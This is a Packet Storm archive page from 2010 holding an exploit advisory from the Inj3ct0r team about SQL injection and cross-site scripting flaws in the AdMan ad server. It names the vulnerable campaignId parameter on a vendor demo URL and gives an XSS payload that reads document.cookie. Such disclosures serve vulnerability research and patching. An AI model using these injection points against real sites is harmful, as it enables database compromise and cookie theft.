what you don't know can hurt you

AdMan Standalone Ad Server Cross Site Scripting / SQL Injection

AdMan Standalone Ad Server Cross Site Scripting / SQL Injection
Posted Jun 19, 2010
Authored by Sid3 effects

AdMan Standalone Ad Server suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | 19c7be7da75e9238a4f29b38a541450d

AdMan Standalone Ad Server Cross Site Scripting / SQL Injection

Change Mirror Download
     ===========================================================
AdMan Standalone Ad Server SQLi AND XSS Vulnerability
===========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : AdMan Standalone Ad Server SQLi AND XSS Vulnerability
Date : june, 18 2010
Vendor url :http://www.formfields.com/adManArea/adManDemo.php
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
DESCRIPTION:
AdMan is a standalone Ad Server that provides publishers with a way to organize ads, view real-time traffic statistics, handle online transactions and interact with advertisers. AdMan is the perfect tool for companies wishing to eliminate commission charges from advertising middlemen and provide more customizable ad products to their advertisers. AdMan is compatible with many other ad management services like Google AdSense, AdBrite, and Commission Junction. This way you can centralize your ad reporting and even provide more customizable ad products to premiere advertisers. Moreover, AdMan utilizes iframes and can therefore be plugged into any existing website architecture. Features: Manage your ads, sell your ads, manage advertisers, provide real time reporting, integrate with 3rd party suppliers, accept credit card payments and much more!

#######################################################################################################
Xploit: SQLI Vulnerability

DEMO URL : http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[SQLI]

###############################################################################################################
Xploit: XSS Vulnerability

Attack Pattern: "><script>alert(document.cookie)</script>

DEMO URL :http://www.formfields.com/adManArea/adMan1/adMan/advertiser/listActiveAdSpacesForCampaign.php?campaignId=[XSS]
###############################################################################################################
# 0day no more
# Sid3^effects

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close